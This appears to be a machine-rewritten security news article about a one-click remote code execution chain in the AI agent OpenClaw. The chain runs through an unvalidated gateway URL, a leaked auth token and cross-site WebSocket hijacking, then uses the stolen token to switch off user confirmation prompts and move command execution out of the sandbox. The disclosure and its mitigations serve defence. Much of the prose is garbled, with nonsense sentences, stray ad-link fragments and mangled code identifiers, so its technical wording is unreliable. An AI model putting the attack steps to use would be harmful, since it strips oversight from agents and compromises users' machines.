The open-source AI personal assistant OpenClaw, which is trusted by more than 100,000 developers, has a critical vulnerability that has been found and turned into a devastating one-click remote code execution exploit This article explores assistant openclaw trusted. . Security researchers at depthfirst General Security Intelligence uncovered a logic flaw that, when combined with other vulnerabilities, could trigger a chain reaction.

requires no user interaction and enables attackers to take total control of victim systems through a single malicious link. Overview of Vulnerabilities: Mechanisms of Technical Attacks AI agents have "god mode" access to messaging apps, API keys, and complete control over the local computer thanks to OpenClaw's architecture. While community enthusiasm surrounding the platform has driven rapid adoption, the security margin for error in such a high-privilege environment becomes razor-thin.

Details of the Attribute Product: OpenClaw (previously known as ClawdBot/Moltbot) Vulnerability Type: Cross-Site WebSocket + Unsafe URL Parameter Handling Impact of Hijacking Remote Code Execution Without Authentication with System-Level Access CVSS Score Critical (9.8+) Attack Vector Network (Single Malicious Link) The recently revealed vulnerability takes advantage of three separate elements that operate sequentially: automatic transmission of authentication tokens, instantaneous gateway connection without validation, and unsafe URL parameter ingestion. Three seemingly harmless operations that take place separately throughout the codebase are where the exploitation chain starts. Learn more Cybersecurity Guide to Hacker Tools Cyber The app-settings.The gatewayUrl query parameter from the URL is accepted by the ts module without verification, and it is then immediately stored in localStorage.

The app-lifecycle is set after the application.The security-sensitive authToken is automatically bundled into the connection handshake to the attacker-controlled gateway server by connectGateway(), which is instantly triggered by ts.

  1. Select RCE Source of the Exploit Kill Chain: depthfirst This pattern creates a critical information disclosure vulnerability. Another WebSocket origin validation vulnerability is exploited by the kill chain. Stage Description The user visits a malicious website. Load JS loads OpenClaw with malicious gatewayUrl. Leak authToken sent to attacker. Connect WebSocket opened to localhost. Guardrails for bypass safety are turned off. Execute Attacker executes commands at random. When victims visit a malicious webpage, attacker-injected JavaScript executes within their browser context, establishing a local connection to the victim’s OpenClaw instance running on localhost:18789. Browser WebSocket implementations rely on server-side origin header validation, which OpenClaw completely ignores, rather than enforcing Same-Origin Policy protections like standard HTTP connections do.

Learn more about Microsoft Bing Ethical hacking training News stories about cybersecurity This Cross-Site WebSocket The attacker can use the victim's browser as a proxy by using hijacking (CSWSH). The attacker uses the operator, admin, and operator roles after authenticating using the stolen token. approvals and scopes to disable safety features.

An executive gives their approval.set request turns off user confirmation prompts, while a config. patch request sets tools.exec.host to “gateway,” forcing command execution directly on the host machine rather than within containerized sandboxes. The final payload invokes node. invoke with arbitrary bash commands, achieving complete system compromise.

Mitigations The OpenClaw development team rapidly addressed the vulnerability by implementing a gateway URL confirmation modal, eliminating the auto-connect without prompt behavior that enabled the attack.

All users running versions prior to v2026.1.24-1 are advised by DepthFirst to upgrade right away as they are still vulnerable. In addition to auditing command execution logs for questionable activity, administrators should rotate authentication tokens. The security risks associated with giving AI agents unrestricted system access without thorough validation of configuration changes and network connections are highlighted by this incident.

Network segmentation should be increased, outgoing WebSocket connections from AI agent processes should be restricted, and audit logs for privilege changes and authentication token usage should be strictly maintained by organizations using OpenClaw., LinkedIn, and X for daily cybersecurity updates. To have your stories featured, get in touch with us.